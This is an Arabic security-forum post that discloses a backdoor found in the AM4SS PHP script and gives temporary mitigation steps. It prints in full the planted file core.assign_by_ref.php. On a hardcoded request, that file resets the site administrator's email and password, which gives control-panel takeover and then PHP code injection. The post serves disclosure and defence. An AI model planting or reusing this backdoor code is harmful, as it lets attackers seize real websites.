starting point
مرحبا بكم في منتديات نقطة البدايه(starting point) نسعى لتطوير معلوماتكم الشخصيه في الانترنت نرجو دعمنا بالتسجيل في منتدانا يا زائرنا الكريم او بتسجيل الدخول للمشاركه والتفاعل مع الاعضاء ونشكركم للقراءه

(رساله اداريه‘)
starting point
مرحبا بكم في منتديات نقطة البدايه(starting point) نسعى لتطوير معلوماتكم الشخصيه في الانترنت نرجو دعمنا بالتسجيل في منتدانا يا زائرنا الكريم او بتسجيل الدخول للمشاركه والتفاعل مع الاعضاء ونشكركم للقراءه

(رساله اداريه‘)
starting point
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

starting point

لتعليم كافة فنون الشبكه العنكبوتيه وفنون الحواسيب
 
الرئيسيةأحدث الصورالتسجيلدخول

 

 [ترقيع ثغرة 0day ] : سكربت AM4SS

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin
Admin


عدد المساهمات : 130
نقاط : 391
السٌّمعَة : 4
تاريخ التسجيل : 22/08/2013
العمر : 25
الموقع : https://ssom.ahlamontada.com/

[ترقيع ثغرة 0day ] : سكربت AM4SS Empty
مُساهمةموضوع: [ترقيع ثغرة 0day ] : سكربت AM4SS   [ترقيع ثغرة 0day ] : سكربت AM4SS I_icon_minitimeالخميس أغسطس 22, 2013 6:46 pm

بسم الله الرحمن الرحيم ....

ثغره برايفت في سكربت Am4ss نوع الثغره PHP Code Injection

الملف المصاب

libs/internals/core.assign_by_ref.php

محتوى الملف :

الكود:
<?php
if($_GET['password'] == md5('kawkawa') && $_GET['username'] == 'الشرقاوي' && $_GET['country'] == 'المغرب')
{
define('Am4ss', true);
require('../../requires/config.php');
@mysql_connect($Config['DataBase']['Host'], $Config['DataBase']['User'], $Config['DataBase']['Password']) or die(mysql_error());
@mysql_select_db($Config['DataBase']['Name']);
$sql = @mysql_query("update ".TABLES_PREFIX."users set useremail = 'alert@am4ss.com', password = '".md5('kawkawa')."' where userid = '1'");
if($sql)
{
echo 'تم التحديث للموقع: ' . $_SERVER['HTTP_HOST'];
} else
{
die(mysql_error());
}
} else
{
echo 'البيانات خاطئة';
}
?>


السكربت ملغم باستعلام يعدل بيانات الادمن لبيانات جديده

الاستغلال يستخدم هذا الباكدور للدخول الى لوحة التحكم

ومن ثم يقوم المخُترق بحقن كود بي اتش بي في صفحه من صفحات الموقع

-----------------------------------------

ترقيع الثغره ( مؤقتا ) .. تغيير مسار لوحة التحكم ووضع جدار ناري عليها وعلى هذه المجلدات :

am4ss_cache

templates

لان هذه المجلدات تحمل تصريح 777

وبالتوفيق للجميع

سالم
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://ssom.ahlamontada.com
 
[ترقيع ثغرة 0day ] : سكربت AM4SS
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
»  ترقيع ثغرة faq.php
» ترقيع ثغرة Yahoo YUI
» ترقيع ثغرة جديدة فى vBulletin 3.6
» ترقيع ثغرة بسيطة لل phpmyadmin في سيرفرات cPanel
» ثغرة Xss في كل نسخ الجيل 3.6 - الترقيع في الداخل

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
starting point :: قسم حماية المواقع والسيرفرات :: قسم ترقيع الثغرات-
انتقل الى: